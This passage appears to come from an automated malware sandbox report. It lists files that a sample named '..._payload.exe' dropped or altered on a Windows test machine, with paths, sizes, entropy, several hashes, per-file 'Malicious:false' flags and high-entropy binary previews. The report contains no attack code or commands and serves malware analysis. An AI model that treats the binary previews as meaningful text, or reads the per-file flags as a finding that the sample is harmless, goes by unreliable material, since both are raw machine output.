                                                                                                      Preview:regf...!.G.#...;#.e......u.....^c..0~okG..z..P.f..w...z.C... ....v.3K...KD.....3c........BCW....T.7.y.....T..b..1...e`.z.....).#.>h..l......Q`.FP..4s....2..{2....0.....f......i.....M.."..q..\a.j]....$.3.6...HR.l.nU.,.}.La..`...UW...j.#..@.!\.o#....6.1..E.:.`.aNB...@.M..^c..A..........6._..1...f...|.c.+YN8R$..v.3t.AJ...E..%.....8>l........s&.....A............_.SD.!X...J'[Z...2.<....^.v...5y*..ARY...$vZT..75..W....X.a.X.s..^Cd...B'..K..t..=.j......\.X......._..B.<....}....,.KwD].+.0m..Z.C...G98.........7...~b..,".QV.......%.qa.*"g.8..$.qM..../.k....KP......g.9?....p..~j..X..p .>.Rt_J..@.^_c...?..%B..1.....'../.[...;4...-s.i.X.r.{..TA0^}a.(.......ON9..._.-i.>.$`..V...h...g.4...p.P.49..B..3X.".Gm..m..n....7.I.)&s...q..n..4..:..x).{W.zN.n..A....@.d....1....}.V......]./?_..#~.%.?Nim=..p......1..."..J.+.%Q...Z..Nv.^GQ..wg'.......5..D+...z}...|...H*1.]..|...^y\...M%...4.....-jf..;X....'.96]@;?z.e?.?......N.-Cd(J.....J~....r_..m>.."...Ef1

                                                                                                      C:\Users\user\AppData\Local\Packages\Microsoft.GetHelp_8wekyb3d8bbwe\AC\GEH\POF.dat.LOG2

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:MS Windows registry file, NT/2000 or above
                                                                                                      Category:dropped
                                                                                                      Size (bytes):8526
                                                                                                      Entropy (8bit):7.9781916910860575
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:192:BBz6VscP//PKUHGD80qkqw+tQdsVAV143U3Haxl1wdQr:z4r3/SUZxuds4SsdQr
                                                                                                      MD5:D8E310789DB720EC3486FBD0BFC24551
                                                                                                      SHA1:BB02B4601D9611FD983EB1599CBB844CCA6E84C7
                                                                                                      SHA-256:EFB5537CB9A977B90097BA77885FBEC05EEBF0F83330C8E55D91D7C0894AE5DE
                                                                                                      SHA-512:63DEF684DA01E2A928DAF5EF0B6F203F56353A664B521AE31A59AEBD929EDCD9C518AB3540DD9F5D0E939BADB4552977E9B19DA8ED8730F3C0577D4E7CDADA82
                                                                                                      Malicious:false
                                                                                                      Preview:regf...z...R|....y.#..O.6Q./....C0....=.O....r.A(.X."b.....-`...o.K.tR...Y..]#..mz.`X....j.tQ.j.QJE;K...O.....DL...B./8N......).B.....i.I;1vq.+"L.CNtQQk..x..6.V.{*.............qU..Y....%.....N.L.a.s.<...[.b...*...`X..%...zN.%.:l3dYg..<8X.Nn...w?....[X...Y..Q...g7G.t.....xo.........a=....-.....x...........;..vE..R.N..8...R......w.u.x.........e..{..6.3npEI...$A...C....ntIa..}'....V.5D^6.9..5.gR.<K,.K..U.....Sq..5@...(f......E....-..".Kv:..]G"...`..tI...;:QF..........}5...=l..E.*...].....+.,A4.V80..Ji.:...w.....,...._w`.&..e...].f..pA....o..H7..m._....`.\4..y....\..A.^ I .M...R ..P.i.UY.......^l.*.2.G..S.zyH......5..f.&3..m..&A......Az...v.2.....t.mkUu'+..j.n.......a=.V.vO5;..W.j.'>..J.7H.hu.`$.:.^.rS.4..2..&ip..r ..4/Y...7.<..'.0....4.......<..F.>....tzD.=....G$.iSI..^(..x.b4hF....(.v..M..CyP7L.'@..?...X,s.....W.,k@.<..W`.3J.53..r.I..ZX..K.i..}.%...>......u..xe.0..\.`x...gE.acOzk.}.`k.f..;..l.7...b.i...u.8.#....u-..Y8i.....K@..Z..

                                                                                                      C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\LocalState\PinnedTiles\26310719480\squaretile.png

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):2727
                                                                                                      Entropy (8bit):7.928546278666031
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:GnvPe4Ys34n8VGnglhkSchwLrS/XBtawU3exSnYbOaZuOA959ZkfhssBgYZ/3Sxs:4e4Ys348jlhYhwA3YksnYf
                                                                                                      MD5:51F235CBAEA9A2BF1205ADCD4276D94E
                                                                                                      SHA1:DF612028D0688442E16DDD55512C17D920CE2A49
                                                                                                      SHA-256:E452D01A3E828836B423A12863A0A34FB5AF11FEB7349780570274500A01028D
                                                                                                      SHA-512:F997B625350E27B823C5F8F1C7C5B3E4C6CA92FB959AFF8426ABEF67853398F9FD2573DBC93E65BB4C81CA5023A4DB4BF0738D83E106B7447D8B9B6A1DDB3845
                                                                                                      Malicious:false
                                                                                                      Preview:.PNG...F.p.....;G.7.jS..e.G...VC.>j.Z!..v.xi.n.....^?A.^..2...|.\..C...;.K..c..M....L..|.Wo.&.u..TSV.W.q.!..9.7.]%v....h......y.>.Zpx.T.2U..m.A.......\..+....P...<)..E.mI....7..ph..7F4t...1..p~.u....$z.s...@69>U.4U....A9..@3.'..?.........N.)9t^...s-o~..o.. .R...c\T..EA...a..D....,C..M=......Z.Wf.w....IkU..*..=.".......Z.V.f...).[....3....g......=.{.,e.DeAL .......U.....qj[m.s.w.5F....+Y..1.h..|..o.9.....t...+......Wfb..Gf..JPb'.o...r+....9.Rk.iB........Y}gBKfYhf....F.oR.R...,.W..|.|.T.|DX......-gB:.......mDm.....Uk(W..p%......E..o.].r!...=..*.S..<&b-Y&.K.Y`...&..HX..M.*..@..bP<...uTV....q........a7O6H..P..$o....@,...4Nn...V....SW6.rZ.......Pn..!.=....|.%.?e...fX..y8h....z.;...@..=...J.q. Q...{v.T...r?_..3.=..,-.....K)'..xJJ..wO.H..zs.Ri8........f I...5{V-h.e%....@.\R~Hc8.l.Gu.fCE..-b;DQ}.{...O..P.m.cW.......I..5..`..c....<\.y...hF....u.,Z..~.4...F.v..C...'...p./...o..$Nm...$..r......&..$./k".g'.h..-..._1m.g~..a.B.^ra.......?.9.W....e...Z

                                                                                                      C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\LocalState\PinnedTiles\26310719480\tinytile.png

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1961
                                                                                                      Entropy (8bit):7.895719936901061
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:2ZWlB7M7uV5aVNl3sckhGvC1HBSGzc0VPFe9GwD:24v1wvC1HsCjt0
                                                                                                      MD5:20E9331599438D1D47B388DA0A811D86
                                                                                                      SHA1:DA28C8FE986216C64A4AB26A6319FD0FE635C0FC
                                                                                                      SHA-256:A57D468C363EB91A6F68C71CD1309D495ACF4D0E32416CD8759C38D76763345E
                                                                                                      SHA-512:C92EB08D6875C0C80B0BBA320186D6FFC832D808641D2251345BF22EBFEB2C0485DE083A267A0E8F63443BD1DA2D8FFCF217A5E2DA1521099E99E7E93DEC7C24
                                                                                                      Malicious:false
                                                                                                      Preview:.PNG... ...\P...`..\`.I.-.1...K9..r.A.j@.......'..H....I..)...].1.'h.%.i.:.../.!..x}..vm.M|%.g..yO..+..N..Y.'..5.-....%.......[O....y.....u..O.....<.L...I<.].h......U...\.}..9.R...M!....!BmZ..Lz...o5..T.~........_..X.932...hm..+...h6.F...@........Y.\............=..G.m.v..=..a_..[%X.D.j..].J.D..6......=....W.kD..5.Oj.....c7;.`.....z....>......4A+..w.`.?..c..*...?....A.;.n...... .:.W.....).i......qm....<......~{..,^...x1Z..|_.z....6I.B_.wM........(...=...>....~D..eJ...cH..U.h..0*.i..}_.N..yU.......E......S{.*..!....@.>...9.B..wv.S.....i.A.|.......C.0PgkV#...X;.....jpV3....LH.u.7..#.b.!..Y??.`.....p5. _n.'.T?0....1E.Nq.7./b...hB.j.J...w.....W.,...X!..n.M.W..xz..) .pt.'.fW;.AG.%7.O..!;..F.m.[.,.....J..G.P.k..c....:.;.a.I.5nCZX.8~.lz...A...st..B....m........e}.A.G7..p....=v...o..<N..hG..4.....\......q......u..mp A.7.Iu..t......lhk...c....Z..#m...I..L.,...R.....2..in..v....^.....7.!.....`$...K.p.g..G.w..n......J...71....gg...F...

                                                                                                      C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\LocalState\PinnedTiles\38975140460\squaretile.png

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):2735
                                                                                                      Entropy (8bit):7.9170423508936345
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:pyEIYggnKUD94vvRUjuaepdbPBOtJoazmfMD9vfdIez0WkC61T+awF7wD:8Wh94kxLtJkezJVRw
                                                                                                      MD5:87D8CDA6A3284238B7AA54FECB1A0A4F
                                                                                                      SHA1:A41DA236110E40D0BF61E6CD079231A34DB865C6
                                                                                                      SHA-256:C7864D10623C337FD941E0B21CDAF043760BF6C4A55DBE556F76A6B169BF4CFB
                                                                                                      SHA-512:38E8206AEF094BC8EBCEEF02847C885885DDCE3D47488002B1E7AB513FCC1B4BCBE18D0107FD64B77FB00A3FA6A107C74102F0DB07347EE0E9AD33183D60B593
                                                                                                      Malicious:false
                                                                                                      Preview:.PNG....S.....\V.i(W...i.-..2...I.H=o.../.Q.....g..o....[%.Uz...vf..Z..K.L..T.T..".1.........9....../.C...rC.............w........{.i...1.W~...n.Y.:.."._.f..1.Z...ci.....+\..W.j-!M....S..E8.`...nkP~KJX..@....F.$.....^w.}................!{...#.JI_.>._.k|.*...o.C...m(U.p......x..%........;....DW>....}l..Y4.G6......Tp.`...9.@..F...{]/M.g...+.Xc.....Z......byi....T[...4b.E....*.Un.X...S.......Z...:.L...7.....v..............7.).{.Vk.`.s...=_q..<B....@.C.v8....cj<FP.....#c..}.c.d^....O...f=.;...3.!.>.....F.A.%i..C.n....84G.T)}s...1.T...n=Y7...|...?.r.@k.p.b#.:...3..\c.c.Q...=]..@vS.w..m...d..e.QU;.)...f.2mR.....G.Q.N. .O.U.b..K"g..1.W0[...`(..z.fF0.7.....;.....n}h0..>.....z..b'. |8N"..{Dw.b.L:o8....w.....qr>..l_l:X.O|\.,.......5v.<.N".R.K.;....?P`..@.U[.....$..h]..Ts_.?.8..G.lk...$.W....G.9..Z.g1Z#<;.BL....t.t&... o..^............M......@..p.oS....i......w......>m.-..'....v/.>....W.7.g .8..L.q%.N.-o.h.>...@._..@.mn7....;H..?..[T./m..._....<.

                                                                                                      C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\LocalState\PinnedTiles\38975140460\tinytile.png

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1911
                                                                                                      Entropy (8bit):7.9024795068486995
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:qVchAjidtOpduRYapXrHdiEPfTYu3TOgOwD:qeFNY+rH8EkWD
                                                                                                      MD5:7A1F0B2965827116DAC8D23702A88BA4
                                                                                                      SHA1:9A28273B5E64EEA7A1B2C475D01180A34D647667
                                                                                                      SHA-256:2B5DBC8C4611D542E2469803BED59D745203551D1D4A621AF352ACB438D9CCE0
                                                                                                      SHA-512:428544F88842B5C39E43C6C5831C300743F7F73A559D2A0AE30DDFBE1E436FB1ACAF73CD53061D533DCB610B91257F974B180CE34868DB3E275D04D9C037828F
                                                                                                      Malicious:false
                                                                                                      Preview:.PNG..;..#..v..sh....(...N.....`..._..1....1...H.Sf....F.........GW.K!.K..S>. .x.F N<....m...3..Y..6i....~...O.....P..E.(V.~.n..g. .......GY......2...0W.........<_%1..(.....My%.w...)A.o.....IC....&(+.I.............C+b.b/.b+.HI..8....0%}...e.....g|....O.. N..P..l...B..xv...A.$.j...(.*3t.]..:.%>.......+..p?...`..j.......ll...'..>....7N..%1t....j.....Y.u)..4..O...8.{.....z.DF.,xY6L.....0.#.q.(s.k..t....O.C.....V..0...../.I...>.G7.`.l."....{.x.y....6...5.).T"....)p{.h.W*.a.....x.......6...C..)...v.9.C.tC...n...9.....Ro.....1.M......p.b^.X...?1]/B..v9.K...f.V.0.?... ...3.(9..3..3..Fj.....%2.7.3..x.q+...m@.;..!.k.\..Y.k...i.U@..&..P9}.f..&Ku....d.o.G[.+.....2t.6W.bD...S.3Z.)K....5-..lOz...Y+~a.....6'Dt..2!~...w.l.....i..H^.8...=.6?x.`k...3....Z.2.i't....LdO..*![X..if.U...p...V...X.d....E.4z0+D*F$K...-.%Z..J.......7L.;..B..<&.M..k.~N]...9cQ.....[.4..K.r..E.d`..2.N...;.M8q...6;.d`.W..........5. ......P^t.[L.q...........;.R....c...!.\.n

                                                                                                      C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\LocalState\PinnedTiles\6501008900\squaretile.png

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1887
                                                                                                      Entropy (8bit):7.887414353844194
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:oCnVZmpSkk30dub9EplP/5hxL2eNKmWXLmqwD:pVEQk40dCmplP/5jL2eNBWk
                                                                                                      MD5:EAA559BC4007FBDF874A40F603E96F48
                                                                                                      SHA1:865D5FC68C4F5D52765D2B0BFADA476773106BAD
                                                                                                      SHA-256:76D718F08A1E9E41CE5F410BEE8362D4299F1D789DE84323324BBBC3011C4BFA
                                                                                                      SHA-512:8C5CC551B9EE2ECE65AAD0670D40785A3EED10D0A9C4A1400922B600804D51A9110543F17A6B260DA8880C39597E77C88B8BC1F7D92BA45B5A196B74663F5C99
                                                                                                      Malicious:false
                                                                                                      Preview:.PNG..;.....4.<...V.t..`..m..G...@.i....z*....^.h..1.T.v...\..".:.w..q+.t......Q..Z....2B.^xY......v.P.....V....B.\R.X.S:!...(..C8.qU .e.x..8............>R...m9{...]Q.f.=G..*f.....+........J..r.g..U.9...y$%...Ed.IvEVG..&8.&..n....@...c....h..J.&.v....pJ......O..W.7o.Q..;"....R......(=..;;.._.sK.........~...WA .f...u.z.GT..\...E\+8.^....`.....P.1>...........X..A...{.-G8.^:.....6......&/vf.U..%.~.sbg..y.Q}?F.......)W...4.u..n..`.}f..!(...n..y.F.R...h.@.>.......E1L.Q..H3..>t...'-.."3..t..Mf``.Ej.. ...K..R..5.l.z.Q....g........W,......*....5... ....p.Q..;.5..)..40..*D.xE....g.3..:......[z...Lu.._C..Y.$.[...;.DAdy...8V...i:.-;..*..EP.#...Zxk[.*.g....v...P<.....[.,."P.s.Pn.>!.F.@'qC.3.@}.H..1...F....-..|Y.2Z..#G.}\...^q..C.3...}........d.&X.y#...}....p.......a...t$H...w.3$o.`..?$......l.............$....b,.N.i.WU.......-r.(...Q%..J#...%2.....e.o6...#T.G....).a..mR$H.......F.....2......Z6....'r.4.._.. ....?M.z3....(.d-......*.i..Qt..`

                                                                                                      C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\LocalState\PinnedTiles\6501008900\tinytile.png

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1447
                                                                                                      Entropy (8bit):7.869126474520786
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:MNADoWFfx804p8dhBmBzBjkNql9Fz/fWPMkKxaEmBZMl1+JWqf3TRpASev6bD:7DjxTbE+klz/uPuxjB+JWqf91ewD
                                                                                                      MD5:5C8F453BCB7B6EC81C58BF31F9DB1ED9
                                                                                                      SHA1:6CBAEC7BDC8F23B9371CEEF2206CA9219C05BA59
                                                                                                      SHA-256:C35092957C4402F960E25157AEEBF558C8109869B3BA6D8B2E45E99F50741102
                                                                                                      SHA-512:AEB161B122BDDEDD35166DB9E4D39A126F8B748B36C45F570CA330C68D24B793299E8B83F6AFFD99DEF2A586309C6EBCA687200D2C5E1C821B8347F7D81D48E3
                                                                                                      Malicious:false
                                                                                                      Preview:.PNG.6.O.*.4@3wo.h...Je.o.V.<}..a.......D...^.H......L.....'WSKZ..D.In}..o..?Mm....L.!B...@nb..3.c:.R.,.....V..z.."....tCp....).....*..*...].du{...5BKB.P..j.j..........W.0.P'.1@.w........S(F%..:3.ij..Ih........q..a./...Fr"..............+T.....\.nH......!.:e.Z.h1]k...Ce..=.6L.q..;..N ..,..;.i!=..^.L..G.....hHT..@|j....f.J:.6.S:|.9.T.......S..4l.I|p...9.U.4..;..:)q........=.[...M.._&.3...OMYTbg.b.O......U..{.Z{um.r.6G...V...t.f......~~..|8.M....My..w<.6np.|..YI/e...it..7.y.."...|*..0.bVuw..c&...}..39&?..y...$<.>.s...tO..q;...*+a0y.)...9..1 ...f....0X.#.x...u..:.+.w.Ch.=.4..h....d]s..........f..}...5.Zn.Vz..k.....u../...x.}.J...+.Z..p[*2_9P......^..i..,o.m...... ........D.....).W.*E...]'nb.f...<.zO*1....[{E}i.K6X._B.Ry...*.p..8.L..`.V.x....t.Z.;..sL...=s...)..a'b...?..x.E..T[z.....{.]..../.(,i.....sY......vI3Z.{..j...#m.T%u0.p:..1.bP.P..u.sZ.k..i.B.. C.U:..d$..2g.x`nz)<....wj.|~...%.....8..4.x]...(...r....1D(X..$z;4...x8.V..-..w.....m>..

                                                                                                      C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\LocalState\PinnedTiles\7603651830\squaretile.png

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1783
                                                                                                      Entropy (8bit):7.898149411705345
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:hRe9823DSoC1WbtBMQSXBELRd83zHsz/7enwD:ho8YHe0tBQRcTqszP
                                                                                                      MD5:C8E4425CA879572D47083D73B0E87775
                                                                                                      SHA1:8A198D3C026E8115FB39AF23E9A11712F0C4D50C
                                                                                                      SHA-256:394E3D18BAA237E401C01633F7902B7B620AF76C88433C567CA1A4A7190D4ADF
                                                                                                      SHA-512:0A22C912121E71EDD305C0FE8252A0430380EAC33B4A5E755D7081203B6074DA095FFB258C3B88161F575B77F1667601800A6621FBDEA94959BAF8988E8CD205
                                                                                                      Malicious:false
                                                                                                      Preview:.PNG...>.2..YLw..a...T.........D.h-PLU`V.`......)....sqP..,......|6c`.....t....~...n].....+).....T.....J...i..L[_R8b......A./.4kPS..........o<.F6.[......P.Z.~....._..d..Z$.\.h$c..!..P;......+cp.|.vYQ..-}...j.'.DMY.^....b.oN...?...5.....+5b....V.f.E.Asx>..M.......)....B.\.5.v_..&.....I.3iaC.?.l..]..M.O....1..b..G...m....#g.L~.:I..N.-c..j...q.sG..$...."..f...[..w...~X.%....{%y.>^.].c.....c.j`..B.....l.,...s.........R.c.b.....8+.}..1.k../.E7.SN4(.......U.H.0..........vj.........8..a1}.....UB.NF...Z..\.6....P..k"........B.)Y. ....OoL8l.mk..].k%..K.+.,f_)...lK....s`>.N............^\}._udM....;.u..ty~...F...D{..Ps...;..~(.}..p....MLs...b.h.......c. T..... r.hJ....]<..L.;.*..........j.,?e]..hU-}...?..u6,..Pd....{....i...(.]...qe#%..........x.....n~O..D0..X.?#q.uFQfb..r.-.wh/.B.P.."*.#..^.o....].....oa.#.[.3.g.v4."........{.."..6..3#.Ud....s.H.*..ZJ[#R ..N..Q.4.*.`.K.%$.NRN....y...w...r...........4j$_].O)).V....].%F......V k.W..<..e.8.5...|.&....

                                                                                                      C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\LocalState\PinnedTiles\7603651830\tinytile.png

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1394
                                                                                                      Entropy (8bit):7.852465411421019
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:Ggkx7pKdIoWPoPq+yTwQMh36wADaubtrvNQ+oo4tQhrHO/Pq3hIApbr43gPv6bD:GgkHKdIozsMHV6wAblv5w/PGIgr4swD
                                                                                                      MD5:27F036B9E0811E049CFE0F568B6C1014
                                                                                                      SHA1:9F0F36BC931D6B89C6797232BF45A159A1EB2214
                                                                                                      SHA-256:58222218E90DBB93BF379444F7EB905EAB2530EDF16BB3C2034C718B6A2A93C7
                                                                                                      SHA-512:2831C7A067D1EDC4F7215A24E979CD2C61198CE7A3163A463259E2EEB0BCEF3551336BD7419425C52C84997DAD4F4F9985DCE10B1CC6FD4D43F37D69E38CE2C2
                                                                                                      Malicious:false
                                                                                                      Preview:.PNG.......'...r.SOO6.L*6\.......#..b.2...m.. q...r.R/~.C./...S^..!;.....{.D.J}K#..b4m#...x...P.*....~......(.......6wu@.^5.L.O....`.k..9v...e...q.S...&...AT.7..@X"s..K.iN{....dV..Y.V..wLD..1H .8.&.V;......Y.q.w..../.Mt'.}...R...)Jh........*R....S@.........^...T.j....X\......d..........Z.u..\o..@..V:.s..^u.f.b|.>.a._..h5.5.<.@.Y..S.|.)i1y..Q5.C.KC...V^_..N....y.....x..j...Y........rK..n...Uu...P=.j...#I*O...b...a.T......b..:....)u&4..'.O.......>......O>.D..g.M.ZS.q....$|n..E....d.Y=M=..@...{.[.e..{.jH.'.s.......&.2..[.J.m*A..(.oX2..<...<...r...<."oS;...dN.Y..\......vX.^..+},..M.a..Rv.?cA...G].5x..Z$.&.m.....m.....Mw..._..k4....j.5..^..=n.rJLI.%..G....y|...v.g....v$Od.S...m.:..uY.......g^."z.*...A;.a.,h..Q...P+..c.V..#....z..W...,......cD3~......XP....E8/B]A..f.}zm...K.0.nzcE>...TG'U....1...j..p5e\.>.1......TYR...<:.+;.y...)^..&[.+.w.r..eYGb.}.Y.#@(\e.,.....wM..@......j..]1e.........Fd.+5|.....pjR...8..)..w.S..........n?....#.%..g.:%U,

                                                                                                      C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\AppData\CacheStorage\CacheStorage.edb

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1573198
                                                                                                      Entropy (8bit):1.3859800349455784
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3072:oeu1AbGDgd8ROD+PmQ+8+KlbFHalNqYeG8ka5oxHGGHitKfZZaayZRuQayZRum:oP+d8Q0SalxHAqiEMmQittBJ
                                                                                                      MD5:004FB220ECEBD05DEEE12A505BBDEAFC
                                                                                                      SHA1:CE7DCCFAE2226BE1C2C4F61C6ADCE691F7C8AF07
                                                                                                      SHA-256:6F2963752E120D728CDD04C2AFF8C0A8B1FA33E5072B667D2EC9AE16C368DA8A
                                                                                                      SHA-512:2AD4462E6275B86080092BAE541DD825A5CFB9D58AA94365EC03EF7C72C8025447237036822E025B256CC18F5D0345062AF9E7E4A69F52C16B67EE3D4310C5F7
                                                                                                      Malicious:false
                                                                                                      Preview:o..........y.&.s..>....,.S..y....P.4_...K+.a2..-w/...H.p.T..R..u.......%....f.m...%....rw.....3.L...*.?....z.v..K>..t..6b.*..m.*...C%.(...J..C.)..]u.y.Qd?.oQj$..C&..U.r.0.a.._u..6....d.!_.%j...0..b@c}0..&J..'...a:]P.COk...E....!.HT]Fm..)....F..5!..3..C..)..z1.?j...O.....F\.s..l.........D./..".wEI..B.......:0..A..3K.x.s...f.7dA;..,wBHVF._..w...>........#j.$+...'.....`.8D...?..HS#.._..X.LF.U.$...XK|.:..U..ES99....([.a+...6hK../.FF.+...u....sc..........~.GT..!h......|...:.3`L.<..o~..-.3.V.2...~...S...Y'1..X7...2.?\..Wf...l...tp.b4.X..{.J01.....4Kp.[lE..i..1......Wjs..I.....>.c..~.PGt.'k.q.sc .w9..]D....5.Mb.:0......t..s.X...@...K/..@..m...N.k....?.P...2."&.^...6I.E.n\.:..$IRd.=.J......I....6..{.M...t...9-..#k...(D[..).S. 9"......D....NOx.....t...6.<..q4..P7..y.D.m...U.f....b.+... ...$........%N..N..Q..u.&N.*'^.P&...5:J.%..~b2.u=kng..{.]...r....l.p.i..8........%Y..E.~.".j.l..<.z.....j8..`....7.1..>.J....i..ZE.U.....E..,'.gB.EH..s.C.

                                                                                                      C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\AppData\CacheStorage\CacheStorage.jfm

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):16718
                                                                                                      Entropy (8bit):7.98839688309939
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:384:a6q6ZQ+goqbcneKTHNtoRBDC+RkqTC9ZY7h5itNlvsIEOHSfaWlhx:a6bPQiHERxVaq5viJv+OHSflv
                                                                                                      MD5:0A941DA659105AEF95874EE59A314182
                                                                                                      SHA1:2FEC3BF8F98C8B36034487668F11F61F72E41891
                                                                                                      SHA-256:3605E136A487C4AE786066AC88CBB1BAC713766335319E043AE44DDF63F17E47
                                                                                                      SHA-512:8A2A6197C46F7E43FC79FAD08892DF6F23F549F64B3EDAAE3E8017B49B973D891D3DFED643A456E5E89858E32751B0F8E08B33C3BE3D2529A1B67580E1B904CD
                                                                                                      Malicious:false
                                                                                                      Preview:......SI..{.!.'.DI.E(.0....ro...}...x.........[..q.D.p.....N.Y..#..'.)Md.^z.l......|a.N....Pb.....N.'...}....B..jt.._..._..hQ....qD3.XNc>...^. ;...^.q.-.\.....t.@.A.3..'..*.W...j%......b.BB...(...ek..sg.t..e>.hn/.h....m...nj.Q.......p.3.h..+.f...G..<...B$.....L+.......N......5#.".......Hv...pi.}._*......H..g.&..rJi.W.9zu..........`.y-X..r......V6.Ac...3......!.U....jN....Dd.!...(..i....0....B.3..C.n...xi..`.e...=.A....o.R. L.A.H...~2...T..dEX"ctEr++|.Lh.....h.Y..L)...|....YJ.....[..Mm$...ZJ.9........0.:j.h.q....h...a"..;..o..e.J.2....Ev.._..F....yB7(......D.......K.n....2.n....b..A1.`...>...\.......d..n../..v...o............$LlQD..A.z;q.8....s..cn.....$...h..9..-$08m..^..ev.fQJ1g_....A{....H)./=7...W..t\.d...L.....x...VpL..d.z..^?.../...jP......A.....=.-...r.E..K.M.G.".{~..6...R.4Ej.QU..\\...k......h..............o.Z......_..S....X...K....W=wS...C...I...5F.f......*.......x...n.0.U.m.[xX..:`..5F.V.1d(..p....[..o...7..x.

                                                                                                      C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\SystemAppData\Helium\User.dat

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:MS Windows registry file, NT/2000 or above
                                                                                                      Category:dropped
                                                                                                      Size (bytes):8526
                                                                                                      Entropy (8bit):7.975917646950308
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:192:tEZ4CbA9/ek9hn/uxf81a4gNbfuMa4AWYvugvxFslv:s4M6ek3nm+E4TBVVxSlv
                                                                                                      MD5:22EC09C83C332D948FBAB20147043ED1
                                                                                                      SHA1:4E53213421B0A7DAD8D1AB75AD17592FF5C4873C
                                                                                                      SHA-256:4ABBBF8C47264C4D82EE3A1511075B1C8C5EE225829EA460123B947D148440A2
                                                                                                      SHA-512:16FB1B19A6C4C7A9737C86A29A11A2B655A3DC1110E9E9912998EBD09DBE1F3AB7DD90EBC03E985D45608F38E5FBDB3F25E5AA814CB3D18233FACA3F92214F47
                                                                                                      Malicious:false
